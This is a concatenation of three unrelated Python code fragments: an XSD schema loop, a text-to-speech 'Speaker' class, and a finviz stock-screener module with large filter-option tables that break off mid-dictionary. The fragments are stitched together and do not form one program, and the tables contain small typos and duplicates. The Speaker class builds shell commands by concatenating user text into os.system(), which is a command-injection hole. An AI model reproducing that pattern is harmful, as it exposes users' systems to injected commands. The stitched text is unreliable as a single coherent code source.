for comp in schema.iter_components():
if isinstance(comp, XsdElement):
print(comp.name, [p.name for p in parents(comp)]) |
import os
import random
class Speaker():
def __init__(self, name="-v alex ", rate="-r 100 "):
self.name = str(name)
self.rate = str(rate)
def __repr__(self):
iamwhoiam = "I am who I am"
return repr(iamwhoiam)
def speak(self, words):
words = self.stripper(words)
os.system('say ' + self.name + self.rate + str(words))
def change_rate(self, rate):
self.rate = "-r " + rate + " "
def change_voice(self, name):
self.name = "-v " + name + " "
def stripper(self, stripped_word):
stripped_word = stripped_word.replace("'","")
return stripped_word
def singer(self, word):
word = self.stripper(word)
few_vals = ['40', '50', '60']
few_rates = ['-r 90', '-r 120', '-r 170', '-r 100', '-r 150']
os.system('say ' + self.name + random.choice(few_rates) + " [[pbas " + random.choice(few_vals) +"]]" + str(word))
|
import os
import configparser
import pandas as pd
from finvizfinance.screener import (
technical,
overview,
valuation,
financial,
ownership,
performance,
)
presets_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), "presets/")
# pylint: disable=C0302
def get_screener_data(
preset_loaded: str, data_type: str, signal: str, limit: int, ascend: bool
):
"""Screener Overview
Parameters
----------
preset_loaded : str
Loaded preset filter
data_type : str
Data type between: overview, valuation, financial, ownership, performance, technical
signal : str
Signal to use to filter data
limit : int
Limit of stocks filtered with presets to print
ascend : bool
Ascended order of stocks filtered to print
Returns
----------
pd.DataFrame
Dataframe with loaded filtered stocks
"""
preset_filter = configparser.RawConfigParser()
preset_filter.optionxform = str # type: ignore
preset_filter.read(presets_path + preset_loaded + ".ini")
d_general = preset_filter["General"]
d_filters = {
**preset_filter["Descriptive"],
**preset_filter["Fundamental"],
**preset_filter["Technical"],
}
for section in ["General", "Descriptive", "Fundamental", "Technical"]:
for key, val in {**preset_filter[section]}.items():
if key not in d_check_screener:
print(f"The screener variable {section}.{key} shouldn't exist!\n")
return pd.DataFrame()
if val not in d_check_screener[key]:
print(
f"Invalid [{section}] {key}={val}. "
f"Choose one of the following options:\n{', '.join(d_check_screener[key])}.\n"
)
return pd.DataFrame()
d_filters = {k: v for k, v in d_filters.items() if v}
if data_type == "overview":
screen = overview.Overview()
elif data_type == "valuation":
screen = valuation.Valuation()
elif data_type == "financial":
screen = financial.Financial()
elif data_type == "ownership":
screen = ownership.Ownership()
elif data_type == "performance":
screen = performance.Performance()
elif data_type == "technical":
screen = technical.Technical()
else:
print("Invalid selected screener type")
return pd.DataFrame()
if signal:
screen.set_filter(signal=d_signals[signal])
else:
if "Signal" in d_general:
screen.set_filter(filters_dict=d_filters, signal=d_general["Signal"])
else:
screen.set_filter(filters_dict=d_filters)
if "Order" in d_general:
if limit > 0:
df_screen = screen.ScreenerView(
order=d_general["Order"],
limit=limit,
ascend=ascend,
)
else:
df_screen = screen.ScreenerView(order=d_general["Order"], ascend=ascend)
else:
if limit > 0:
df_screen = screen.ScreenerView(limit=limit, ascend=ascend)
else:
df_screen = screen.ScreenerView(ascend=ascend)
return df_screen
d_signals = {
"top_gainers": "Top Gainers",
"top_losers": "Top Losers",
"new_high": "New High",
"new_low": "New Low",
"most_volatile": "Most Volatile",
"most_active": "Most Active",
"unusual_volume": "Unusual Volume",
"overbought": "Overbought",
"oversold": "Oversold",
"downgrades": "Downgrades",
"upgrades": "Upgrades",
"earnings_before": "Earnings Before",
"earnings_after": "Earnings After",
"recent_insider_buying": "Recent Insider Buying",
"recent_insider_selling": "Recent Insider Selling",
"major_news": "Major News",
"horizontal_sr": "Horizontal S/R",
"tl_resistance": "TL Resistance",
"tl_support": "TL Support",
"wedge_up": "Wedge Up",
"wedge_down": "Wedge Down",
"wedge": "Wedge",
"triangle_ascending": "Triangle Ascending",
"triangle_descending": "Triangle Descending",
"channel_up": "Channel Up",
"channel_down": "Channel Down",
"channel": "Channel",
"double_top": "Double Top",
"double_bottom": "Double Bottom",
"multiple_top": "Multiple Top",
"multiple_bottom": "Multiple Bottom",
"head_shoulders": "Head & Shoulders",
"head_shoulders_inverse": "Head & Shoulders Inverse",
}
d_check_screener = {
"Order": [
"Any",
"Signal",
"Ticker",
"Company",
"Sector",
"Industry",
"Country",
"Market Cap.",
"Price/Earnings",
"Forward Price/Earnings",
"PEG (Price/Earnings/Growth)",
"Price/Sales",
"Price/Book",
"Price/Cash",
"Price/Free Cash Flow",
"Dividend Yield",
"Payout Ratio",
"EPS(ttm)",
"EPS growth this year",
"EPS growth next year",
"EPS growth past 5 years",
"EPS growth next 5 years",
"Sales growth past 5 years",
"EPS growth qtr over qtr",
"Sales growth qtr over qtr",
"Shares Outstanding",
"Shares Float",
"Insider Ownership",
"Insider Transactions",
"Institutional Ownership",
"Institutional Transactions",
"Short Interest Share",
"Short Interest Ratio",
"Earnings Date",
"Return on Assets",
"Return on Equity",
"Return on Investment",
"Current Ratio",
"Quick Ratio",
"LT Debt/Equity",
"Total Debt/Equity",
"Gross Margin",
"Operating Margin",
"Net Profit Margin",
"Analyst Recommendation",
"Performance (Week)",
"Performance (Month)",
"Performance (Quarter)",
"Performance (Half Year)",
"Performance (Year)",
"Performance (Year To Date)",
"Beta",
"Average True Range",
"Volatility (Week)",
"Volatility (Month)",
"20-Day SMA (Relative)",
"50-Day SMA (Relative)",
"200-Day SMA (Relative)",
"50-Day High (Relative)",
"50-Day Low (Relative)",
"52-Week High (Relative)",
"52-Week Low (Relative)",
"Relative Strength Index (14)",
"Average Volume (3 Month)",
"Relative Volume",
"Change",
"Change from Open",
"Gap",
"Volume",
"Price",
"Target Price",
"IPO Date",
],
"Signal": [
"Any",
"Top Gainers",
"Top Losers",
"New High",
"New Low",
"Most Volatile",
"Most Active",
"Unusual Volume",
"Overbought",
"Oversold",
"Downgrades",
"Upgrades",
"Earnings Before",
"Earnings After",
"Recent Insider Buying",
"Recent Insider Selling",
"Major News",
"Horizontal S/R",
"TL Resistance",
"TL Support",
"Wedge Up",
"Wedge Down",
"Triangle Ascending",
"Triangle Descending",
"Wedge",
"Channel Up",
"Channel Down",
"Channel",
"Double Top",
"Double Bottom",
"Multiple Top",
"Multiple Bottom",
"Head & Shoulders",
"Head & Shoulders Inverse",
],
"Exchange": ["Any", "AMEX", "NASDAQ", "NYSE"],
"Market Cap.": [
"Any",
"Mega ($200bln and more)",
"Large ($10bln to $200bln)",
"Mid ($2bl to $10bln)",
"Small ($300mln to $2bln)",
"Micro ($50mln to $300mln)",
"Nano (under $50mln)",
"+Large (over $50mln)",
"+Mid (over $2bln)",
"+Small (over $300mln)",
"+Micro (over $50mln)",
"-Large (under $200bln)",
"-Mid (under $10bln)",
"-Small (under $2bln)",
"-Micro (under $300mln)",
],
"Earnings Date": [
"Any",
"Today",
"Today Before Market Open",
"Today Before Market Close",
"Tomorrow",
"Tomorrow Before Market Open",
"Tomorrow Before Market Close",
"Yesterday",
"Yesterday Before Market Open",
"Yesterday Before Market Close",
"Next 5 Days",
"Previous 5 Days",
"This Week",
"Next Week",
"Previous Week",
"This Month",
],
"Target Price": [
"Any",
"50% Above Price",
"40% Above Price",
"30% Above Price",
"20% Above Price",
"10% Above Price",
"5% Above Price",
"Above Price",
"Below Price",
"5% Below Price",
"10% Below Price",
"20% Below Price",
"30% Below Price",
"40% Below Price",
"50% Below Price",
],
"Index": ["Any", "S&P 500", "DJIA"],
"Dividend Yield": [
"Any",
"None (0%)",
"Positive (>0%)",
"High (>5%)",
"Very High (>10%)",
"Over 1%",
"Over 2%",
"Over 3%",
"Over 4%",
"Over 5%",
"Over 6%",
"Over 7%",
"Over 8%",
"Over 9%",
"Over 10%",
],
"Average Volume": [
"Any",
"Under 50K",
"Under 100K",
"Under 500K",
"Under 750K",
"Under 1M",
"Over 50K",
"Over 100K",
"Over 200K",
"Over 300K",
"Over 400K",
"Over 500K",
"Over 750K",
"Over 1M",
"Over 2M",
"100K to 500K",
"100K to 1M",
"500K to 1M",
"500K to 10M",
],
"IPO Date": [
"Any",
"Today",
"Yesterday",
"In the last week",
"In the last month",
"In the last quarter",
"In the last year",
"In the last 2 years",
"In the last 3 years",
"In the last 5 years",
"More than a year ago",
"More that 5 years ago",
"More than 10 years ago",
"More than 15 years ago",
"More than 20 years ago",
"More than 25 years ago",
],
"Sector": [
"Any",
"Basic Materials",
"Communication Services",
"Consumer Cyclical",
"Consumer Defensive",
"Energy",
"Financial",
"Healthcare",
"Industrials",
"Real Estate",
"Technology",
"Utilities",
],
"Float Short": [
"Any",
"Low (<5%)",
"High(>20%)",
"Under 5%",
"Under 10%",
"Under 15%",
"Under 20%",
"Under 25%",
"Under 30%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
],
"Relative Volume": [
"Any",
"Over 10",
"Over 5",
"Over 3",
"Over 2",
"Over 1.5",
"Over 1",
"Over 0.75",
"Over 0.5",
"Over 0.25",
"Under 2",
"Under 1",
"Under 1.5",
"Under 1",
"Under 0.75",
"Under 0.5",
"Under 0.25",
"Under 0.1",
],
"Shares Outstanding": [
"Any",
"Under 1M",
"Under 5M",
"Under 10M",
"Under 20M",
"Under 50M",
"Under 100M",
"Over 1M",
"Over 2M",
"Over 5M",
"Over 10M",
"Over 20M",
"Over 50M",
"Over 100M",
"Over 200M",
"Over 500M",
"Over 1000M",
],
"Industry": [
"Any",
"Agricultural Inputs",
"Aluminium",
"Building Materials",
"Chemicals",
"Coking Coal",
"Copper",
"Gold",
"Lumber & Wood Production",
"Other Industrial Metals & Mining",
"Other Precious Metals & Mining",
"Paper & Paper Products",
"Silver",
"Specialty Chemicals",
"Steel",
],
"Analyst Recom.": [
"Any",
"Strong Buy (1)",
"Buy or better",
"Buy",
"Hold or better",
"Hold",
"Hold or worse",
"Sell",
"Sell or worse",
"Strong Sell (5)",
],
"Current Volume": [
"Any",
"Under 100K",
"Under 500K",
"Under 750K",
"Under 1M",
"Over 0",
"Over 50K",
"Over 100K",
"Over 200K",
"Over 300K",
"Over 400K",
"Over 500K",
"Over 750K",
"Over 1M",
"Over 2M",
"Over 5M",
"Over 10M",
"Over 20M",
],
"Float": [
"Any",
"Under 1M",
"Under 5M",
"Under 10M",
"Under 20M",
"Under 50M",
"Under 100M",
"Over 1M",
"Over 2M",
"Over 5M",
"Over 10M",
"Over 20M",
"Over 50M",
"Over 100M",
"Over 200M",
"Over 500M",
"Over 1000M",
],
"Country": [
"Any",
"Asia",
"Europe",
"Latin America",
"BRIC",
"Argentina",
"Australia",
"Bahamas",
"Belgium",
"BeNeLux",
"Bermuda",
"Brazil",
"Canada",
"Cayman Islands",
"Chile",
"China",
"China & Hong Kong",
"Colombia",
"Cyprus",
"Denmark",
"Finland",
"France",
"Germany",
"Greece",
"Hong Kong",
"Hungary",
"Iceland",
"Iceland",
"India",
"Indonesia",
"Ireland",
"Israel",
"Italy",
"Japan",
"Kazakhstan",
"Luxembourg",
"Malaysia",
"Malta",
"Mexico",
"Monaco",
"Netherlands",
"New Zealand",
"Norway",
"Panama",
"Peru",
"Philippines",
"Portugal",
"Russia",
"Singapore",
"South Africa",
"South Korea",
"Spain",
"Sweden",
"Switzerland",
"Taiwan",
"Turkey",
"United Arab Emirates",
"United Kingdom",
"Uruguay",
"USA",
"Foreign (ex-USA)",
],
"Option/Short": ["Any", "Optionable", "Shortable", "Optionable and shortable"],
"Price": [
"Any",
"Under $1",
"Under $2",
"Under $3",
"Under $4",
"Under $5",
"Under $7",
"Under $10",
"Under $15",
"Under $20",
"Under $30",
"Under $40",
"Under $50",
"Over $1",
"Over $2",
"Over $3",
"Over $4",
"Over $5",
"Over $7",
"Over $10",
"Over $15",
"Over $20",
"Over $30",
"Over $40",
"Over $50",
"Over $60",
"Over $70",
"Over $80",
"Over $90",
"Over $100",
"$1 to $5",
"$1 to $10",
"$1 to $20",
"$5 to %10",
"$5 to $20",
"$5 to $50",
"$10 to $20",
"$10 to $50",
"$20 to $50",
"$50 to $100",
],
"P/E": [
"Any",
"Low (<15)",
"Profitable (>0)",
"High (>50)",
"Under 5",
"Under 10",
"Under 15",
"Under 20",
"Under 25",
"Under 30",
"Under 35",
"Under 40",
"Under 45",
"Under 50",
"Over 5",
"Over 10",
"Over 15",
"Over 25",
"Over 30",
"Over 35",
"Over 40",
"Over 45",
"Over 50",
],
"Price/Cash": [
"Any",
"Low (<3)",
"High (>50)",
"Under 1",
"Under 2",
"Under 3",
"Under 4",
"Under 5",
"Under 6",
"Under 7",
"Under 8",
"Under 9",
"Under 10",
"Over 1",
"Over 2",
"Over 3",
"Over 4",
"Over 5",
"Over 6",
"Over 7",
"Over 8",
"Over 9",
"Over 10",
"Over 20",
"Over 30",
"Over 40",
"Over 50",
],
"EPS growthnext 5 years": [
"Any",
"Negative (<0%)",
"Positive (>0%)",
"Positive Low (<10%)",
"High (>25%)",
"Under 5%",
"Under 10%",
"Under 15%",
"Under 20%",
"Under 25%",
"Under 30%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
],
"Return on Equity": [
"Any",
"Positive (>0%)",
"Negative (<0%)",
"Very Positive (>30%)",
"Very Negative (<-15%)",
"Under -50%",
"Under -40%",
"Under -35%",
"Under -30%",
"Under -25%",
"Under -20%",
"Under -15%",
"Under -10%",
"Under -5%",
"Over +50%",
"Over +45%",
"Over +40%",
"Over +35%",
"Over +30%",
"Over +25%",
"Over +20%",
"Over +15%",
"Over +10%",
"Over +5%",
],
"Debt/Equity": [
"Any",
"High (>0.5)",
"Low (<0.1)",
"Under 1",
"Under 0.9",
"Under 0.8",
"Under 0.7",
"Under 0.6",
"Under 0.5",
"Under 0.4",
"Under 0.3",
"Under 0.2",
"Under 0.1",
"Over 0.1",
"Over 0.2",
"Over 0.3",
"Over 0.4",
"Over 0.5",
"Over 0.6",
"Over 0.7",
"Over 0.8",
"Over 0.9",
"Over 1",
],
"InsiderOwnership": [
"Any",
"Low (<5%)",
"High (>30%)",
"Very High (>50%)",
"Over 10%",
"Over 20%",
"Over 30%",
"Over 40%",
"Over 50%",
"Over 60%",
"Over 70%",
"Over 80%",
"Over 90%",
],
"Forward P/E": [
"Any",
"Low (<15)",
"Profitable (>0)",
"High (>50)",
"Under 5",
"Under 10",
"Under 15",
"Under 20",
"Under 25",
"Under 30",
"Under 35",
"Under 40",
"Under 45",
"Under 50",
"Over 5",
"Over 10",
"Over 15",
"Over 20",
"Over 25",
"Over 30",
"Over 35",
"Over 40",
"Over 45",
"Over 50",
],
"Price/Free Cash Flow": [
"Any",
"Low (<15)",
"High (>50)",
"Under 5",
"Under 10",
"Under 15",
"Under 20",
"Under 25",
"Under 30",
"Under 35",
"Under 40",
"Under 45",
"Under 50",
"Under 60",
"Under 70",
"Under 80",
"Under 90",
"Under 100",
"Over 5",
"Over 10",
"Over 15",
"Over 20",
"Over 25",
"Over 30",
"Over 35",
"Over 40",
"Over 45",
"Over 50",
"Over 60",
"Over 70",
"Over 80",
"Over 90",
"Over 100",
],
"Sales growthpast 5 years": [
"Any",
"Negative (<0%)",
"Positive (>0%)",
"Positive Low (0-10%)",
"High (>25%)",
"Under 5%",
"Under 10%",
"Under 15%",
"Under 20%",
"Under 25%",
"Under 30%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
],
"Return on Investment": [
"Any",
"Positive (>0%)",
"Negative (<0%)",
"Very Positive (>25%)",
"Very Negative (<-10%)",
"Under -50%",
"Under -45%",
"Under -40%",
"Under -35%",
"Under -30%",
"Under -25%",
"Under -20%",
"Under -15%",
"Under -10%",
"Under -5%",
"Over +5%",
"Over +10%",
"Over +15%",
"Over +20%",
"Over +25%",
"Over +30%",
"Over +35%",
"Over +40%",
"Over +45%",
"Over +50%",
],
"Gross Margin": [
"Any",
"Positive (>0%)",
"Negative (<0%)",
"High (>50%)",
"Under 90%",
"Under 80%",
"Under 70%",
"Under 60%",
"Under 50%",
"Under 45%",
"Under 40%",
"Under 35%",
"Under 30%",
"Under 25%",
"Under 20%",
"Under 15%",
"Under 10%",
"Under 5%",
"Under 0%",
"Under -10%",
"Under -20%",
"Under -30%",
"Under -50%",
"Under -70%",
"Under -100%",
"Over 0%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
"Over 40%",
"Over 45%",
"Over 50%",
"Over 60%",
"Over 70%",
"Over 80%",
"Over 90%",
],
"InsiderTransactions": [
"Any",
"Very Negative (<20%)",
"Negative (<0%)",
"Positive (>0%)",
"Very Positive (>20%)",
"Under -90%",
"Under 80%",
"Under 70%",
"Under -60%",
"Under -50%",
"Under -45%",
"Under 40%",
"Under -35%",
"Under -30%",
"Under -25%",
"Under -20%",
"Under -15%",
"Under -10%",
"Under -5%",
"Over +5%",
"Over +10%",
"Over +15%",
"Over +20%",
"Over +25%",
"Over +30%",
"Over +35%",
"Over +40%",
"Over +45%",
"Over +50%",
"Over +60%",
"Over +70%",
"Over +80%",
"Over +90%",
],
"PEG": [
"Any",
"Low (<1)",
"High (>2)",
"Under 1",
"Under 2",
"Under 3",
"Over 1",
"Over 2",
"Over 3",
],
"EPS growththis year": [
"Any",
"Negative (<0%)",
"Positive (>0%)",
"Positive Low (0-10%)",
"High (>25%)",
"Under 5%",
"Under 10%",
"Under 15%",
"Under 20%",
"Under 25%",
"Under 30%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
],
"EPS growthqtr over qtr": [
"Any",
"Negative (<0%)",
"Positive (>0%)",
"Positive Low (0-10%)",
"High (>25%)",
"Under 5%",
"Under 10%",
"Under 15%",
"Under 20%",
"Under 25%",
"Under 30%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
],
"Current Ratio": [
"Any",
"High (>3)",
"Low (<1)",
"Under 1",
"Under 0.5",
"Over 0.5",
"Over 1",
"Over 1.5",
"Over 2",
"Over 3",
"Over 4",
"Over 5",
"Over 10",
],
"Operating Margin": [
"Any",
"Negative (<0%)",
"Positive (>0%)",
"Very Negative (<-20%)",
"High (>25%)",
"Under 90%",
"Under 80%",
"Under 70%",
"Under 60%",
"Under 50%",
"Under 45%",
"Under 40%",
"Under 35%",
"Under 30%",
"Under 25%",
"Under 20%",
"Under 15%",
"Under 10%",
"Under 5%",
"Under 0%",
"Under -10%",
"Under -20%",
"Under -30%",
"Under -50%",
"Under -70%",
"Under -100%",
"Over 0%",
"Over 10%",
"Under 15%",
"Over 20%",
"Over 25%",
"Over 30%",
"Over 35%",
"Over 40%",
"Over 45%",
"Over 50%",
"Over 60%",
"Over 70%",
"Over 80%",
"Over 90%",
],
"InstitutionalOwnership": [
"Any",
"Low (<5%)",
"High (>90%)",
"Under 90%",
"Under 80%",
"Under 70%",
"Under 60%",
"Under 50%",
"Under 40%",
"Under 30%",
"Under 20%",
"Under 10%",
"Over 10%",
"Over 20%",
"Over 30%",
"Over 40%",
"Over 50%",
"Over 60%",
"Over 70%",
"Over 80%",
"Over 90%",
],
"P/S": [
"Any",
"Low (<1)",
"High (>10)",
"Under 1",
"Under 2",
"Under 3",
"Under 4",
"Under 5",
"Under 6",
"Under 7",
"Under 8",
"Under 9",
"Under 10",
"Over 1",
"Over 2",
"Over 3",
"Over 4",
"Over 5",
"Over 6",
"Over 6",
"Over 7",
"Over 8",
"Over 9",
"Over 10",
],
"EPS growthnext year": [
"Any",
"Negative (<0%)",
"Positive (>0%)",
"Positive Low (0-10%)",
"High (>25%)",
"Under 5%",
"Under 10%",
"Under 15%",
"Under 20%",
"Under 25%",
"Under 30%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
],
"Sales growthqtr over qtr": [
"Any",
"Negative (<0%)",
"Positive (>0%)",
"Positive Low (0-10%)",
"High (>25%)",
"Under 5%",
"Under 10%",
"Under 15%",
"Under 20%",
"Under 25%",
"Under 30%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
],
"Quick Ratio": [
"Any",
"High (>3)",
"Low (<0.5)",
"Under 1",
"Under 0.5",
"Over 0.5",
"Over 1",
"Over 1.5",
"Over 2",
"Over 3",
"Over 4",
"Over 5",
"Over 10",
],
"Net Profit Margin": [
"Any",
"Positive (>0%)",
"Negative (<0%)",
"Very Negative (<-20%)",
"High (>20%)",
"Under 90%",
"Under 80%",
"Under 70%",
"Under 60%",
"Under 50%",
"Under 45%",
"Under 40%",
"Under 35%",
"Under 30%",
"Under 25%",
"Under 20%",
"Under 15%",
"Under 10%",
"Under 5%",
"Under 0%",
"Under -10%",
"Under -20%",
"Under -30%",
"Under -50%",
"Under -70%",
"Under -100%",
"Over 0%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
"Over 35%",
"Over 40%",
"Over 45%",
"Over 50%",
"Over 60%",
"Over 70%",
"Over 80%",
"Over 90%",
],
"InstitutionalTransactions": [
"Any",
"Very Negative (<20%)",
"Negative (<0%)",
"Positive (>0%)",
"Very Positive (>20%)",
"Under -50%",
"Under -45%",
"Under -40%",
"Under -35%",
"Under -30%",
"Under -25%",
"Under -20%",
"Under -15%",
"Under -10%",
"Under -5%",
"Over +5%",
"Over +10%",
"Over +15%",
"Over +20%",
"Over +25%",
"Over +30%",
"Over +35%",
"Over +40%",
"Over +45%",
"Over +50%",
],
"P/B": [
"Any",
"Low (<1)",
"High (>5)",
"Under 1",
"Under 2",
"Under 3",
"Under 4",
"Under 5",
"Under 6",
"Under 7",
"Under 8",
"Under 9",
"Under 10",
"Over 1",
"Over 2",
"Over 3",
"Over 4",
"Over 5",
"Over 6",
"Over 7",
"Over 8",
"Over 9",
"Over 10",
],
"EPS growthpast 5 years": [
"Any",
"Negative (<0%)",
"Positive (>0%)",
"Positive Low (0-10%)",
"High (>25%)",
"Under 5%",
"Under 10%",
"Under 15%",
"Under 20%",
"Under 25%",
"Under 30%",
"Over 5%",
"Over 10%",
"Over 15%",
"Over 20%",
"Over 25%",
"Over 30%",
],
"Return on Assets": [
"Any",
"Positive (>0%)",
"Negative (<0%)",
"Very Positive (>15%)",
"Very Negative (<-15%)",
"Under -50%",
"Under -45%",
"Under -40%",
"Under -35%",
"Under -30%",
"Under -25%",
"Under -20%",
"Under -15%",
"Under -10%",
"Under -5%",
"Over +5%",
"Over +10%",
"Over +15%",
"Over +20%",
"Over +25%",
"Over +30%",
"Over +35%",
"Over +40%",
"Over +45%",
"Over +50%",
],
"LT Debt/Equity": [
"Any",
"High (>0.5)",
"Low (<0.1)",
"Under 1",
"Under 0.9",
"Under 0.8",
"Under 0.7",
"Under 0.6",
"Under 0.5",
"Under 0.4",
"Under 0.3",
"Under 0.2",
"Under 0.1",
"Over 0.1",
"Over 0.2",
"Over 0.3",
"Over 0.4",
"Over.5",
"Over 0.6",
"Over 0.7",
"Over 0.8",
"Over 0.9",
"Over 1",
],
"Payout Ratio": [
"Any",
"None (0%)",
"Positive (>0%)",
"Low (<20%)",
"High (>50%)",
"Over 0%",
"Over 10%",
"Over 20%",
"Over 30%",
"Over 40%",
"Over 50%",
"Over 60%",
"Over 70%",
"Over 80%",
"Over 90%",
"Over 100%",
"Under 10%",
"Under 20%",
"Under 30%",
"Under 40%",
"Under 50%",
"Under 60%",
"Under 70%",
"Under 80%",
"Under 90%",
"Under 100%",
],
"Performance": [
"Any",
"Today Up",
"Today Down",
"Today -15%",
"Today -10%",
"Today -5%",
"Today +5%",
"Today +10%",
"Today +15%",
"Week -30%",
"Week -20%",
"Week -10%",
"Week Down",
"Week Up",
"Week +10%",
"Week +20%",
"Week +30%",
"Month -50%",
"Month -30%",
"Month -20%",
"Month -10%",
"Month Down",
"Month Up",
"Month +10%",
"Month +20%",
"Month +30%",
"Month +50%",
"Quarter -50%",
"Quarter -30%",
"Quarter -20%",
"Quarter -10%",
"Quarter Down",
"Quarter Up",
"Quarter +10%",
"Quarter +20%",
"Quarter +30%",
"Quarter +50%",
"Half -75%",
"Half -50%",
"Half -30%",
"Half -20%",
"Half -10%",
"Half Down",
"Half Up",
"Half +10%",
"Half +20%",
"Half +30%",
"Half +50%",
"Half +100%",
"Year -75%",
"Year -50%",
"Year -30%",
"Year -20%",
"Year -10%",
"Year Down",
"Year Up",
"Year +10%",
"Year +20%",
"Year +30%",
"Year +50%",
"Year +100%",
"Year +200%",
"Year +300%",
"Year +500%",
"YTD -75%",
"YTD -50%",
"YTD -30%",
"YTD -20%",
"YTD -10%",
"YTD -5%",
"YTD Down",
"YTD Up",
"YTD +5%",
"YTD +10%",
"YTD +20%",
"YTD +30",
"YTD +50%",
"YTD +100%",
],
"20-Day Simple Moving Average": [
"Any",
"Price below SMA20",
"Price 10% below SMA20",
"Price 20% below SMA20",
"Price 30% below SMA20",
"Price 40% below SMA20",
"Price 50% below SMA20",
"Price above SMA20",
"Price 10% above SMA20",
"Price 20% above SMA20",
"Price 30% above SMA20",
"Price 40% above SMA20",
"Price 50% above SMA20",
"Price crossed SMA20",
"Price crossed SMA20 above",
"Price crossed SMA20 below",
"SMA20 crossed SMA50",
"SMA20 crossed SMA50 above",
"SMA20 crossed SMA50 below",
"SMA20 cross SMA200",
"SMA20 crossed SMA200 below",
"SMA20 crossed SMA200 above",
"SMA20 above SMA50",
"SMA20 below SMA50",
"SMA20 above SMA200",
"SMA20 below SMA200",
],
"20-Day High/Low": [
"Any",
"New High",
"New Low",
"5% or more below High",
"10% or more below High",
"15% or more below High",
"20% or more below High",
"30% or more below High",
"40% or more below High",
"50% or more below High",
"0-3% below High",
"0-5% below High",
"0-10% below High",
"5% or more above Low",
"10% or more above Low",
"15% or more above Low",
"20% or more above Low",
"30% or more above Low",
"40% or more above Low",
"50% or more above Low",
"0-3% above Low",
"0-5% above Low",
"0-10% above Low",
],
"Beta": [
"Any",
"Under 0",
"Under 0.5",
"Under 1",
"Under 1.5",
"Under 2",
"Over 0",
"Over 0.5",
"Over 1",
"Over 1.5",
"Over 2",
"Over 2.5",
"Over 3",
"Over 4",
"0 to 0.5",
"0 to 1",
"0.5 to 1",
"0.5 to 1.5",
"1 to 1.5",
"1 to 2",
],
"Performance 2": [
"Any",
"Today Up",
"Today Down",
"Today -15%",
"Today -10%",
"Today -5%",
"Today +5%",
"Today +10%",
"Today +15%",
"Week -30%",
"Week -20%",
"Week -10%",
"Week Down",
"Week Up",
"Week +10%",
"Week +20%",
"Week +30%",
"Month -50%",
"Month -30%",
"Month -20%",
"Month -10%",
"Month Down",
"Month Up",
"Month +10%",
"Month +20%",
"Month +30%",
"Month +50%",
"Quarter -50%",
"Quarter -30%",
"Quarter -20%",
"Quarter -10%",
"Quarter Down",
"Quarter Up",
"Quarter +10%",
"Quarter +20%",
"Quarter +30%",
"Quarter +50%",
"Half -75%",
"Half -50%",
"Half -30%",
"Half -20%",
"Half -10%",
"Half Down",
"Half Up",
"Half +10%",
"Half +20%",
"Half +30%",
"Half +50%",
"Half +100%",
"Year -75%",
"Year -50%",
"Year -30%",
"Year -20%",
"Year -10%",
"Year Down",
"Year Up",
"Year +10%",
"Year +20%",
"Year +30%",
"Year +50%",
"Year +100%",
"Year +200%",
"Year +300%",
"Year +500%",
"YTD -75%",
"YTD -50%",
"YTD -30%",
"YTD -20%",
"YTD -10%",
"YTD -5%",
"YTD Down",
"YTD Up",
"YTD +5%",
"YTD +10%",
"YTD +20%",
"YTD +30",
"YTD +50%",
"YTD +100%",
],
"50-Day Simple Moving Average": [
"Any",
"Price below SMA50",
"Price 10% below SMA50",
"Price 20% below SMA50",
"Price 30% below SMA50",
"Price 40% below SMA50",
"Price 50% below SMA50",
"Price above SMA50",
"Price 10% above SMA50",
"Price 20% above SMA50",
"Price 30% above SMA50",
"Price 40% above SMA50",
"Price 50% above SMA50",
"Price crossed SMA50",
"Price crossed SMA50 above",
"Price crossed SMA50 below",
"SMA50 crossed SMA20",
"SMA50 crossed SMA20 above",
"SMA50 crossed SMA20 below",
"SMA50 cross SMA200",
"SMA50 crossed SMA200 below",
"SMA50 crossed SMA200 above",
"SMA50 above SMA20",
"SMA50 below SMA20",
"SMA50 above SMA200",
"SMA50 below SMA200",
],
"50-Day High/Low": [
"Any",
"New High",
"New Low",
"5% or more below High",
"10% or more below High",
"15% or more below High",
"20% or more below High",
"30% or more below High",
"40% or more below High",
"50% or more below High",
"0-3% below High",
"0-5% below High",
"0-10% below High",
"5% or more above Low",
"10% or more above Low",
"15% or more above Low",
"20% or more above Low",
"30% or more above Low",
"40% or more above Low",
"50% or more above Low",
"0-3% above Low",
"0-5% above Low",
"0-10% above Low",
],
"Average True Range": [
"Any",
"Over 0.25",
"Over 0.5",
"Over 0.75",
"Over 1",
"Over 1.5",
"Over 2. Over 2.5",
"Over 3",
"Over 3.5",
"Over 4",
"Over 4.5",
"Over 5",
"Under 0.25",
"Under 0.5",
"Under 0.75",
"Under 1",
"Under 1.5",
"Under 2",
"Under 2.5",
"Under 3",
"Under 3.5",
"Under 4",
"Under 4.5",
"Under 5",
],
"Volatility": [
"Any",
"Week - Over 3%",
"Week - Over 4%",
"Week - Over 5%",
"Week - 6%",
"Week - 7%",
"Week - 8%",
"Week - 9%",
"Week - 10%",
"Week - 12%",
"Week - 15%",
"Month - 2%",
"Month - 3%",
"Month - 4%",
"Month 5%",
"Month 5%",
"Month 6%",
"Month 7%",
"Month 8%",
"Month 9%",
"Month 10%",
"Month 12%",
"Month 15%",
],
"200-Day Simple Moving Average": [
"Any",
"Price below SMA200",
"Price 10% below SMA200",
"Price 20% below SMA200",
"Price 30% below SMA200",
"Price 40% below SMA200",
"Price 50% below SMA200",
"Price above SMA200",
"Price 10% above SMA200",
"Price 20% above SMA200",
"Price 30% above SMA200",
"Price 40% above SMA200",
"Price 50% above SMA200",
"Price crossed SMA200",
"Price crossed SMA200 above",
"Price crossed SMA200 below",
